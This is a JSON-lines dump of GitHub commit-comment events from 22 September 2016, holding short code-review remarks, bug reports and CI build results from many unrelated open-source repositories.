{"id":"4600764309","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19125778,"position":null,"line":null,"path":null,"commit_id":"90e6015e93112a2fd209d92728ba7fb13d40a7d4","created_at":"2016-09-22T07:10:34Z","updated_at":"2016-09-22T07:10:34Z","body":"@pb00068 Looks like the correct fix here is\r\n```\r\n                           &&  ttValue > VALUE_MATED_IN_MAX_PLY\r\n```\r\nto avoid rbeta becoming -VALUE_INFINITE in singular search, since we subtract 2 * depth from ttValue.\r\n          Value rBeta = ttValue - 2 * depth / ONE_PLY;"}},"created_at":"2016-09-22T07:10:34Z"}
{"id":"4600765112","type":"CommitCommentEvent","actor":{"login":"barnash"},"repo":{"name":"bigpandaio/rate-limiter-wrapper"},"payload":{"comment":{"id":19125781,"position":12,"line":12,"path":"index.js","commit_id":"bd983204808871fd4e618dac19f48a9fa6725f73","created_at":"2016-09-22T07:10:49Z","updated_at":"2016-09-22T07:10:49Z","body":"@ronsherf we need to remove the auth token and use only IP.\r\n"}},"created_at":"2016-09-22T07:10:49Z"}
{"id":"4600765163","type":"CommitCommentEvent","actor":{"login":"barbarosh"},"repo":{"name":"SwanCourses/Guz-Vitaliy"},"payload":{"comment":{"id":19125782,"position":1,"line":1,"path":"client/modules/Post/components/PostList.css","commit_id":"1dd3754f513cf02d715ab5b398cd06c5cd169777","created_at":"2016-09-22T07:10:50Z","updated_at":"2016-09-22T07:10:50Z","body":"Это хорошо, только зание сделать не это. Нам этот компонент не понадобится."}},"created_at":"2016-09-22T07:10:50Z"}
{"id":"4600766595","type":"CommitCommentEvent","actor":{"login":"barnash"},"repo":{"name":"bigpandaio/rate-limiter-wrapper"},"payload":{"comment":{"id":19125787,"position":16,"line":16,"path":"index.js","commit_id":"bd983204808871fd4e618dac19f48a9fa6725f73","created_at":"2016-09-22T07:11:18Z","updated_at":"2016-09-22T07:11:18Z","body":"@ronsherf maybe we should change the order of some of the conditions here"}},"created_at":"2016-09-22T07:11:18Z"}
{"id":"4600766697","type":"CommitCommentEvent","actor":{"login":"Aexyn"},"repo":{"name":"akarnokd/AgeraTest2"},"payload":{"comment":{"id":19125788,"position":null,"line":null,"path":null,"commit_id":"b6f6c2ec9ee165dfc1824d5107adcbd1376f0264","created_at":"2016-09-22T07:11:20Z","updated_at":"2016-09-22T07:11:20Z","body":"N00b here. Can you please explain this new 'done' and unique' fields."}},"created_at":"2016-09-22T07:11:20Z"}
{"id":"4600766837","type":"CommitCommentEvent","actor":{"login":"physcocode"},"repo":{"name":"cweiske/Known"},"payload":{"comment":{"id":19125789,"position":null,"line":null,"path":null,"commit_id":"538c3dbdc19ac6f17b2bfcddb3476b46f580b97e","created_at":"2016-09-22T07:11:22Z","updated_at":"2016-09-22T07:11:22Z","body":"This commit is not related to encoding .. shouldn't it be separate ?"}},"created_at":"2016-09-22T07:11:22Z"}
{"id":"4600769624","type":"CommitCommentEvent","actor":{"login":"jake20001"},"repo":{"name":"jake20001/backend"},"payload":{"comment":{"id":19125796,"position":1,"line":1,"path":"README.md","commit_id":"62c78b7b8c9f9ed8dabba9d34befb3f0bed01589","created_at":"2016-09-22T07:12:13Z","updated_at":"2016-09-22T07:12:13Z","body":"后台功能函数"}},"created_at":"2016-09-22T07:12:13Z"}
{"id":"4600771133","type":"CommitCommentEvent","actor":{"login":"ke-ke"},"repo":{"name":"ke-ke/github"},"payload":{"comment":{"id":19125798,"position":null,"line":null,"path":null,"commit_id":"46f37271b2aea184e853796a28b94ea01ea2a342","created_at":"2016-09-22T07:12:39Z","updated_at":"2016-09-22T07:12:39Z","body":"哈哈哈哈吼吼吼吼吼吼吼吼吼吼吼吼"}},"created_at":"2016-09-22T07:12:39Z"}
{"id":"4600772400","type":"CommitCommentEvent","actor":{"login":"xulayen"},"repo":{"name":"xulayen/WeChat"},"payload":{"comment":{"id":19125802,"position":null,"line":null,"path":null,"commit_id":"473bd70ce5623c1c6276db4d149f0d85730e46b2","created_at":"2016-09-22T07:13:02Z","updated_at":"2016-09-22T07:13:02Z","body":"we"}},"created_at":"2016-09-22T07:13:02Z"}
{"id":"4600772736","type":"CommitCommentEvent","actor":{"login":"malusma2013"},"repo":{"name":"FAUMobileWeb/Juvenile-Diabetes-Management"},"payload":{"comment":{"id":19125803,"position":null,"line":null,"path":null,"commit_id":"6f8e5a737e988c48c40c7055323b37841247f06d","created_at":"2016-09-22T07:13:09Z","updated_at":"2016-09-22T07:13:09Z","body":"C:/Users/Hobnir/Desktop/brackets/binary.html\r\nC:/Users/Hobnir/Desktop/brackets/binary.css\r\n![images9uhw433j](https://cloud.githubusercontent.com/assets/21955398/18739557/70b82e28-8072-11e6-9579-15dde8d47bcd.png)\r\n![background hmw1 1](https://cloud.githubusercontent.com/assets/21955398/18739561/7865af9c-8072-11e6-8842-97bd2aac62c4.png)\r\n\r\n"}},"created_at":"2016-09-22T07:13:09Z"}
{"id":"4600776075","type":"CommitCommentEvent","actor":{"login":"akarnokd"},"repo":{"name":"akarnokd/AgeraTest2"},"payload":{"comment":{"id":19125812,"position":null,"line":null,"path":null,"commit_id":"b6f6c2ec9ee165dfc1824d5107adcbd1376f0264","created_at":"2016-09-22T07:14:07Z","updated_at":"2016-09-22T07:14:07Z","body":"Done lists how many elements got through and unique detects duplicate emissions. Agera skips a lot."}},"created_at":"2016-09-22T07:14:07Z"}
{"id":"4600778054","type":"CommitCommentEvent","actor":{"login":"dallancarr"},"repo":{"name":"aspnet/Security"},"payload":{"comment":{"id":19125817,"position":45,"line":701,"path":"src/Microsoft.AspNetCore.Authentication.OpenIdConnect/OpenIdConnectHandler.cs","commit_id":"1a4e3ac705ab504c5fbd551ac15e7ed566478b60","created_at":"2016-09-22T07:14:43Z","updated_at":"2016-09-22T07:14:43Z","body":"Small grammatical check here.  🙄"}},"created_at":"2016-09-22T07:14:43Z"}
{"id":"4600780732","type":"CommitCommentEvent","actor":{"login":"NitriKx"},"repo":{"name":"mmazi/rescu"},"payload":{"comment":{"id":19125822,"position":null,"line":null,"path":null,"commit_id":"35ef764e51005ce0d31dc90c0bd9227f6082fb01","created_at":"2016-09-22T07:15:29Z","updated_at":"2016-09-22T07:15:29Z","body":"Thanks a lot! "}},"created_at":"2016-09-22T07:15:29Z"}
{"id":"4600781888","type":"CommitCommentEvent","actor":{"login":"smurphylaw"},"repo":{"name":"smurphylaw/smurphylaw.github.io"},"payload":{"comment":{"id":19125824,"position":1,"line":1,"path":"CNAME","commit_id":"5153912e1ed3ef9ff6f2d3c3f789df68ec976ba4","created_at":"2016-09-22T07:15:49Z","updated_at":"2016-09-22T07:15:49Z","body":"www.stephenmurphy.me"}},"created_at":"2016-09-22T07:15:49Z"}
{"id":"4600782758","type":"CommitCommentEvent","actor":{"login":"dallancarr"},"repo":{"name":"aspnet/Security"},"payload":{"comment":{"id":19125827,"position":45,"line":701,"path":"src/Microsoft.AspNetCore.Authentication.OpenIdConnect/OpenIdConnectHandler.cs","commit_id":"1a4e3ac705ab504c5fbd551ac15e7ed566478b60","created_at":"2016-09-22T07:16:04Z","updated_at":"2016-09-22T07:16:04Z","body":"Actually on second read it is OK. "}},"created_at":"2016-09-22T07:16:04Z"}
{"id":"4600783974","type":"CommitCommentEvent","actor":{"login":"noamshemesh"},"repo":{"name":"bigpandaio/rate-limiter-wrapper"},"payload":{"comment":{"id":19125829,"position":12,"line":12,"path":"index.js","commit_id":"bd983204808871fd4e618dac19f48a9fa6725f73","created_at":"2016-09-22T07:16:26Z","updated_at":"2016-09-22T07:16:26Z","body":"just a reminder: this is an open source. maybe (but probably not) there are other users"}},"created_at":"2016-09-22T07:16:26Z"}
{"id":"4600785483","type":"CommitCommentEvent","actor":{"login":"SaptakS"},"repo":{"name":"fossasia/codeheat.org"},"payload":{"comment":{"id":19125831,"position":null,"line":null,"path":null,"commit_id":"8e19d2798b19655802e52706fb1a2229122440d1","created_at":"2016-09-22T07:16:56Z","updated_at":"2016-09-22T07:16:56Z","body":"Sorry. Missed it. My bad."}},"created_at":"2016-09-22T07:16:56Z"}
{"id":"4600787118","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19125836,"position":null,"line":null,"path":null,"commit_id":"3282e244d53fca3da36869bd607acb99911907e2","created_at":"2016-09-22T07:17:25Z","updated_at":"2016-09-22T07:17:25Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2340 of 2341 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T07:17:25Z"}
{"id":"4600787294","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19125837,"position":null,"line":null,"path":null,"commit_id":"959c2d264f5d976f087c8682776cd8bd7c32ea9e","created_at":"2016-09-22T07:17:28Z","updated_at":"2016-09-22T07:17:28Z","body":"Tamed with no problems. It just adds a control device like the Krayts and the faction pets instead of one with an image of the pet."}},"created_at":"2016-09-22T07:17:28Z"}
{"id":"4600788450","type":"CommitCommentEvent","actor":{"login":"sridharkalaibala"},"repo":{"name":"Posnic/POSNIC-1.03"},"payload":{"comment":{"id":19125840,"position":50,"line":646,"path":"add_sales.php","commit_id":"c47b24c2a054817e2ba08ff1d8ef12bd6f0de67d","created_at":"2016-09-22T07:17:49Z","updated_at":"2016-09-22T07:17:49Z","body":"function names or variable name should be meaningful.  So that others can understand. "}},"created_at":"2016-09-22T07:17:49Z"}
{"id":"4600790231","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools-livecd"},"payload":{"comment":{"id":19125845,"position":null,"line":null,"path":null,"commit_id":"5f753518caa4957f336e9a034d0bf7cdecdc679c","created_at":"2016-09-22T07:18:20Z","updated_at":"2016-09-22T07:18:20Z","body":"you missed .gtkrc-2.0"}},"created_at":"2016-09-22T07:18:20Z"}
{"id":"4600791177","type":"CommitCommentEvent","actor":{"login":"2betop"},"repo":{"name":"fex-team/fis-plus-smarty-plugin"},"payload":{"comment":{"id":19125848,"position":9,"line":26,"path":"compiler.html.php","commit_id":"410f74a986aa7d8c15b2c552556a4883b86b077e","created_at":"2016-09-22T07:18:37Z","updated_at":"2016-09-22T07:18:37Z","body":"这个地方应该是 .= 把上面的 strCode 给搞没了，包含 setFramework 得逻辑"}},"created_at":"2016-09-22T07:18:37Z"}
{"id":"4600791310","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19125849,"position":null,"line":null,"path":null,"commit_id":"90e6015e93112a2fd209d92728ba7fb13d40a7d4","created_at":"2016-09-22T07:18:40Z","updated_at":"2016-09-22T07:18:40Z","body":"@joergoster Since alpha get assigned rBeta - 1 should'nt it be \r\n` &&  ttValue > VALUE_MATED_IN_MAX_PLY + 1` \r\n?"}},"created_at":"2016-09-22T07:18:40Z"}
{"id":"4600793011","type":"CommitCommentEvent","actor":{"login":"pksuf07"},"repo":{"name":"pksuf07/qrobot"},"payload":{"comment":{"id":19125856,"position":null,"line":null,"path":null,"commit_id":"05c3234ea7bacd99bf1419d105a7c5f09b271d01","created_at":"2016-09-22T07:19:09Z","updated_at":"2016-09-22T07:19:09Z","body":"main script"}},"created_at":"2016-09-22T07:19:09Z"}
{"id":"4600796669","type":"CommitCommentEvent","actor":{"login":"soumikdas"},"repo":{"name":"anilhdas/Peak_ARG"},"payload":{"comment":{"id":19125860,"position":1,"line":1,"path":"To Anil","commit_id":"47c7ee383ff66bf23a23b43f2c04eba78baa4b90","created_at":"2016-09-22T07:20:10Z","updated_at":"2016-09-22T07:20:10Z","body":"[suffle.zip](https://github.com/anilhdas/Peak_ARG/files/486669/suffle.zip)\r\n"}},"created_at":"2016-09-22T07:20:10Z"}
{"id":"4600797350","type":"CommitCommentEvent","actor":{"login":"rikkipitt"},"repo":{"name":"afiedler/rails_admin_history_rollback"},"payload":{"comment":{"id":19125861,"position":null,"line":null,"path":null,"commit_id":"669588ffa942c13c5f3052f3c228122a99d2a75a","created_at":"2016-09-22T07:20:20Z","updated_at":"2016-09-22T07:20:20Z","body":"@afiedler Hey mate, I've fixed this in v0.1.0 of my gem! Let me know if it helps in your case!\r\n\r\nCheers,\r\nRikki"}},"created_at":"2016-09-22T07:20:20Z"}
{"id":"4600798444","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19125862,"position":5,"line":41,"path":"main/template/default/export/table_pdf.tpl","commit_id":"758af7a863ef247e733af264a119464d885000b3","created_at":"2016-09-22T07:20:37Z","updated_at":"2016-09-22T07:20:37Z","body":"It should be \"is not empty\". Fixed."}},"created_at":"2016-09-22T07:20:37Z"}
{"id":"4600801237","type":"CommitCommentEvent","actor":{"login":"oblonski"},"repo":{"name":"graphhopper/directions-api-clients-route-optimization"},"payload":{"comment":{"id":19125876,"position":9,"line":124,"path":"csharp/src/IO.Swagger.Test/Model/ActivityTests.cs","commit_id":"4b716298cc603e4efd34c75268bc2774620309af","created_at":"2016-09-22T07:21:21Z","updated_at":"2016-09-22T07:21:21Z","body":"Is this automatically generated for us to write the corresponding ut?"}},"created_at":"2016-09-22T07:21:21Z"}
{"id":"4600801756","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19125878,"position":60,"line":60,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/GDTreeTrainer.java","commit_id":"189f8eb391e3ecbcac21507176a5b0d85ccc2064","created_at":"2016-09-22T07:21:29Z","updated_at":"2016-09-22T07:21:29Z","body":"Not sure if the constructor is required"}},"created_at":"2016-09-22T07:21:29Z"}
{"id":"4600802393","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19125879,"position":null,"line":null,"path":null,"commit_id":"61eb069da7e627db8bf9851ab34b6ab2020abc96","created_at":"2016-09-22T07:21:41Z","updated_at":"2016-09-22T07:21:41Z","body":"Doing a rebuild now, if it works I'll leave it as is, if not I'll revert. Keep your fingers crossed"}},"created_at":"2016-09-22T07:21:41Z"}
{"id":"4600804254","type":"CommitCommentEvent","actor":{"login":"axot"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":19125883,"position":null,"line":null,"path":null,"commit_id":"248fdfcf7356f2c20ab1e6afd1e9f295d08331c7","created_at":"2016-09-22T07:22:11Z","updated_at":"2016-09-22T07:22:11Z","body":"Did #72011 fixed in PHP 5 ?"}},"created_at":"2016-09-22T07:22:11Z"}
{"id":"4600804415","type":"CommitCommentEvent","actor":{"login":"soumikdas"},"repo":{"name":"anilhdas/Peak_ARG"},"payload":{"comment":{"id":19125884,"position":1,"line":1,"path":"To Anil","commit_id":"47c7ee383ff66bf23a23b43f2c04eba78baa4b90","created_at":"2016-09-22T07:22:14Z","updated_at":"2016-09-22T07:22:14Z","body":"We have uploaded IMAGE SHUFFLE PUZZLE game..Please check and revert for any clarification.\r\n"}},"created_at":"2016-09-22T07:22:14Z"}
{"id":"4600806075","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools-livecd"},"payload":{"comment":{"id":19125886,"position":null,"line":null,"path":null,"commit_id":"5f753518caa4957f336e9a034d0bf7cdecdc679c","created_at":"2016-09-22T07:22:43Z","updated_at":"2016-09-22T07:22:43Z","body":"It is needed for styling of root qt-apps as discussed a while ago with @philmmanjaro "}},"created_at":"2016-09-22T07:22:43Z"}
{"id":"4600807963","type":"CommitCommentEvent","actor":{"login":"Gobberwart"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19125887,"position":null,"line":null,"path":null,"commit_id":"530c7c75072ff70e68461a9a2c7636dd0451a354","created_at":"2016-09-22T07:23:13Z","updated_at":"2016-09-22T07:23:13Z","body":"What issue?"}},"created_at":"2016-09-22T07:23:13Z"}
{"id":"4600808645","type":"CommitCommentEvent","actor":{"login":"UnrealCatze"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19125889,"position":null,"line":null,"path":null,"commit_id":"ad8e28c8cf2b447b726896e27f77596e9e4d3aeb","created_at":"2016-09-22T07:23:27Z","updated_at":"2016-09-22T07:23:27Z","body":"ok i have add this line and get this now:\r\n\r\nNotice: Undefined index: user_theme in /var/www/vhosts/xxxxxxxxxxx.com/httpdocs/site/includes/classes/PHPFusion/Authenticate.php on line 163"}},"created_at":"2016-09-22T07:23:27Z"}
{"id":"4600810363","type":"CommitCommentEvent","actor":{"login":"Gobberwart"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19125893,"position":null,"line":null,"path":null,"commit_id":"530c7c75072ff70e68461a9a2c7636dd0451a354","created_at":"2016-09-22T07:23:55Z","updated_at":"2016-09-22T07:23:55Z","body":"#5318 error is \"fatal: reference is not a tree: 8dcbe285c4df94dc871ea655a8a9ceabf5133881\r\nUnable to checkout '8dcbe285c4df94dc871ea655a8a9ceabf5133881' in submodule path 'web'\r\nEntering 'web'\"\r\n\r\nWhat error is this causing?"}},"created_at":"2016-09-22T07:23:55Z"}
{"id":"4600811692","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19125896,"position":null,"line":null,"path":null,"commit_id":"90e6015e93112a2fd209d92728ba7fb13d40a7d4","created_at":"2016-09-22T07:24:19Z","updated_at":"2016-09-22T07:24:19Z","body":"Congrats!"}},"created_at":"2016-09-22T07:24:19Z"}
{"id":"4600813993","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19125900,"position":null,"line":null,"path":null,"commit_id":"61eb069da7e627db8bf9851ab34b6ab2020abc96","created_at":"2016-09-22T07:25:01Z","updated_at":"2016-09-22T07:25:01Z","body":"This requires a New Data Table in sql and tre modifications Last i tred it it works we had 250 items for player inventory but only works if you make a new character not a old one."}},"created_at":"2016-09-22T07:25:01Z"}
{"id":"4600814303","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19125901,"position":40,"line":40,"path":"hydrator-plugins/spark-plugins/widgets/GDTreeTrainer-sparksink.json","commit_id":"189f8eb391e3ecbcac21507176a5b0d85ccc2064","created_at":"2016-09-22T07:25:06Z","updated_at":"2016-09-22T07:25:06Z","body":"can we use the number widget instead? That will make sure the user enters only number at least from the UI"}},"created_at":"2016-09-22T07:25:06Z"}
{"id":"4600815139","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19125904,"position":null,"line":null,"path":null,"commit_id":"9d6bcb2398a0996114a20785209c4a875d8bbd88","created_at":"2016-09-22T07:25:19Z","updated_at":"2016-09-22T07:25:19Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 148](http://build.prxm.it:8813/viewLog.html?buildId=3667&buildTypeId=nes_mongo_build&guest=1) outcome was **FAILURE**\nSummary: Error while applying patch Build time: 00:01:23"}},"created_at":"2016-09-22T07:25:19Z"}
{"id":"4600815140","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19125903,"position":null,"line":null,"path":null,"commit_id":"9d6bcb2398a0996114a20785209c4a875d8bbd88","created_at":"2016-09-22T07:25:19Z","updated_at":"2016-09-22T07:25:19Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 148](http://build.prxm.it:8813/viewLog.html?buildId=3667&buildTypeId=nes_mongo_build&guest=1) outcome was **FAILURE**\nSummary: Error while applying patch Build time: 00:01:23"}},"created_at":"2016-09-22T07:25:19Z"}
{"id":"4600815339","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19125905,"position":45,"line":45,"path":"hydrator-plugins/spark-plugins/widgets/GDTreeTrainer-sparksink.json","commit_id":"189f8eb391e3ecbcac21507176a5b0d85ccc2064","created_at":"2016-09-22T07:25:23Z","updated_at":"2016-09-22T07:25:23Z","body":"same as above"}},"created_at":"2016-09-22T07:25:23Z"}
{"id":"4600815746","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19125906,"position":50,"line":50,"path":"hydrator-plugins/spark-plugins/widgets/GDTreeTrainer-sparksink.json","commit_id":"189f8eb391e3ecbcac21507176a5b0d85ccc2064","created_at":"2016-09-22T07:25:30Z","updated_at":"2016-09-22T07:25:30Z","body":"same as above"}},"created_at":"2016-09-22T07:25:30Z"}
{"id":"4600817191","type":"CommitCommentEvent","actor":{"login":"luigidellaquila"},"repo":{"name":"orientechnologies/orientdb"},"payload":{"comment":{"id":19125909,"position":6,"line":90,"path":"core/src/main/java/com/orientechnologies/orient/core/iterator/ORecordIteratorClass.java","commit_id":"12747e0a142160de96694deae5312ce19958e1b2","created_at":"2016-09-22T07:25:56Z","updated_at":"2016-09-22T07:25:56Z","body":"Hi @danstruthers \r\n\r\nGood point, I'm reviewing it\r\n\r\nThanks\r\n\r\nLuigi"}},"created_at":"2016-09-22T07:25:56Z"}
{"id":"4600819857","type":"CommitCommentEvent","actor":{"login":"barnash"},"repo":{"name":"bigpandaio/rate-limiter-wrapper"},"payload":{"comment":{"id":19125917,"position":12,"line":12,"path":"index.js","commit_id":"bd983204808871fd4e618dac19f48a9fa6725f73","created_at":"2016-09-22T07:26:40Z","updated_at":"2016-09-22T07:26:40Z","body":"cool thanks.\r\nI'm pretty sure other users don't use the `authInfo.token` which is kind of internal thing for us."}},"created_at":"2016-09-22T07:26:40Z"}
{"id":"4600821244","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"shminer/android_kernel_lge_g5"},"payload":{"comment":{"id":19125918,"position":null,"line":null,"path":null,"commit_id":"8b952a394f85f2720524743967108988cd54377f","created_at":"2016-09-22T07:27:06Z","updated_at":"2016-09-22T07:27:06Z","body":"Ofcouse~\r\nBut if you want to share your kernel to some one, don`t forget tell them flash this zip.~\r\n\r\nBTW, I tested the new media HAL driver, everything is OK!"}},"created_at":"2016-09-22T07:27:06Z"}
{"id":"4600821409","type":"CommitCommentEvent","actor":{"login":"23Skidoo"},"repo":{"name":"hvr/multi-ghc-travis"},"payload":{"comment":{"id":19125919,"position":4,"line":146,"path":"make_travis_yml_2.hs","commit_id":"1b6dc0aa9c42ab9e0c4bf47c30fdec8fedddee68","created_at":"2016-09-22T07:27:09Z","updated_at":"2016-09-22T07:27:09Z","body":"Doesn't it pick up the appropriate `-j` value by default based on the number of cores?"}},"created_at":"2016-09-22T07:27:09Z"}
{"id":"4600823459","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":19125923,"position":null,"line":null,"path":null,"commit_id":"dd363f081e9108129ec53119b650e97b7310483d","created_at":"2016-09-22T07:27:39Z","updated_at":"2016-09-22T07:27:39Z","body":"Exactamente, mellor usa templates. Con JSP podes ter a misma lógica que fixestes en Java.\r\nOs tags, mellor úsaos cando non teñas máis remedio de usar Java (en caso de necesitares acceso a base de datos por ejemplo), e únicamente devolve valores concretos (int, String ou objetos) sin HTML."}},"created_at":"2016-09-22T07:27:39Z"}
{"id":"4600824686","type":"CommitCommentEvent","actor":{"login":"cat-in-136"},"repo":{"name":"cat-in-136/redmine_scheduling_poll"},"payload":{"comment":{"id":19125924,"position":3,"line":15,"path":"app/models/scheduling_poll_item.rb","commit_id":"6cb10ddfeb023c577fe3d193947750db71425b62","created_at":"2016-09-22T07:27:58Z","updated_at":"2016-09-22T07:27:58Z","body":"Thank you for your advice.\r\nI did not know [has_many :through Association](http://guides.rubyonrails.org/association_basics.html#the-has-many-through-association). I'll learn it!"}},"created_at":"2016-09-22T07:27:58Z"}
{"id":"4600825755","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"shminer/android_kernel_lge_g5"},"payload":{"comment":{"id":19125928,"position":null,"line":null,"path":null,"commit_id":"8b952a394f85f2720524743967108988cd54377f","created_at":"2016-09-22T07:28:14Z","updated_at":"2016-09-22T07:28:14Z","body":"Perfect! Great :)\r\n\r\nI can include new libraries inside zip kernel package! THanks"}},"created_at":"2016-09-22T07:28:14Z"}
{"id":"4600826438","type":"CommitCommentEvent","actor":{"login":"freestyle21"},"repo":{"name":"react-component/calendar"},"payload":{"comment":{"id":19125929,"position":61,"line":204,"path":"src/Calendar.jsx","commit_id":"987f6c32555a2caeeb0cd82de9fc71a08ebdb77d","created_at":"2016-09-22T07:28:24Z","updated_at":"2016-09-22T07:28:24Z","body":"这里会覆盖`timePicker`的 `default props` ?"}},"created_at":"2016-09-22T07:28:24Z"}
{"id":"4600830868","type":"CommitCommentEvent","actor":{"login":"CreeperMario"},"repo":{"name":"wiiudev/pyGecko"},"payload":{"comment":{"id":19125944,"position":14,"line":13,"path":"colors.py","commit_id":"cf466623fee37e9500ce13ce7494c83a4c9885b1","created_at":"2016-09-22T07:29:42Z","updated_at":"2016-09-22T07:29:42Z","body":"I'm assuming that you change this to whatever the IP Address of your console is. I don;t have splatoon and only experimented with Gecko briefly, though I believe you should change this line."}},"created_at":"2016-09-22T07:29:42Z"}
{"id":"4600831890","type":"CommitCommentEvent","actor":{"login":"gkahiu"},"repo":{"name":"gltn/stdm"},"payload":{"comment":{"id":19125946,"position":null,"line":null,"path":null,"commit_id":"739db913ecc2b3246af8e2db3de71bbec9e27f48","created_at":"2016-09-22T07:30:01Z","updated_at":"2016-09-22T07:30:01Z","body":"@pgathogo, I have written a function (see reference [here](https://github.com/gltn/stdm/blob/master/data/configuration/profile.py#L536)) for attempting to rename an entity that exists in the configuration but has not yet been created in the database, as such could you integrate this into the configuration wizard and test whether it works?\r\n\r\nSee snippet below on usage:\r\n\r\n`profile.rename([previous_entity_name], [new_entity_name])`\r\n\r\nI have not tested it yet due to time constraints but please integrate it first then let me know whether it works as expected."}},"created_at":"2016-09-22T07:30:01Z"}
{"id":"4600832041","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"shminer/android_kernel_lge_g5"},"payload":{"comment":{"id":19125947,"position":null,"line":null,"path":null,"commit_id":"8b952a394f85f2720524743967108988cd54377f","created_at":"2016-09-22T07:30:04Z","updated_at":"2016-09-22T07:30:04Z","body":"Dont :) , My pleasure~"}},"created_at":"2016-09-22T07:30:04Z"}
{"id":"4600832773","type":"CommitCommentEvent","actor":{"login":"jiyousub"},"repo":{"name":"lhs1208/hellogit"},"payload":{"comment":{"id":19125950,"position":15,"line":15,"path":"지도.html","commit_id":"edd03d4900d7ad7a3fe2b4bacf046bd3ab7776b4","created_at":"2016-09-22T07:30:16Z","updated_at":"2016-09-22T07:30:16Z","body":"adf"}},"created_at":"2016-09-22T07:30:16Z"}
{"id":"4600832938","type":"CommitCommentEvent","actor":{"login":"manzing"},"repo":{"name":"MiFrance/miui-xml-V7-FRENCH"},"payload":{"comment":{"id":19125952,"position":null,"line":null,"path":null,"commit_id":"ada5ff5058a52b1fb0b0c3c7f25c5f9b6a780a65","created_at":"2016-09-22T07:30:19Z","updated_at":"2016-09-22T07:30:19Z","body":"Petites fautes : c'est \"appairé\" et non \"apparié\" qu'il faudrait mettre."}},"created_at":"2016-09-22T07:30:19Z"}
{"id":"4600833906","type":"CommitCommentEvent","actor":{"login":"oblonski"},"repo":{"name":"graphhopper/jsprit"},"payload":{"comment":{"id":19125954,"position":null,"line":null,"path":null,"commit_id":"42ae57d00b3c30c3cebe5451af08bffd061fb479","created_at":"2016-09-22T07:30:35Z","updated_at":"2016-09-22T07:30:35Z","body":"@PGWelch Thanks a lot for your valuable input 👍 . Happy that you and He were so fast in checking this. Seems to be an important feature ;)."}},"created_at":"2016-09-22T07:30:35Z"}
{"id":"4600834502","type":"CommitCommentEvent","actor":{"login":"Inspirelife96"},"repo":{"name":"leancloud/objc-sdk"},"payload":{"comment":{"id":19125955,"position":null,"line":null,"path":null,"commit_id":"25754d2dfe66f90796e8bdf5ef3095f1a3de3975","created_at":"2016-09-22T07:30:45Z","updated_at":"2016-09-22T07:30:45Z","body":"Looks this change has a bug. \r\nI used 3.4.2 version and crashed in line routerInfo[LCAPIHostEntryKey] = entry; in cacheAPIHostWithServiceRegion method. \r\nThe routerInfo is not mutable since the change above."}},"created_at":"2016-09-22T07:30:45Z"}
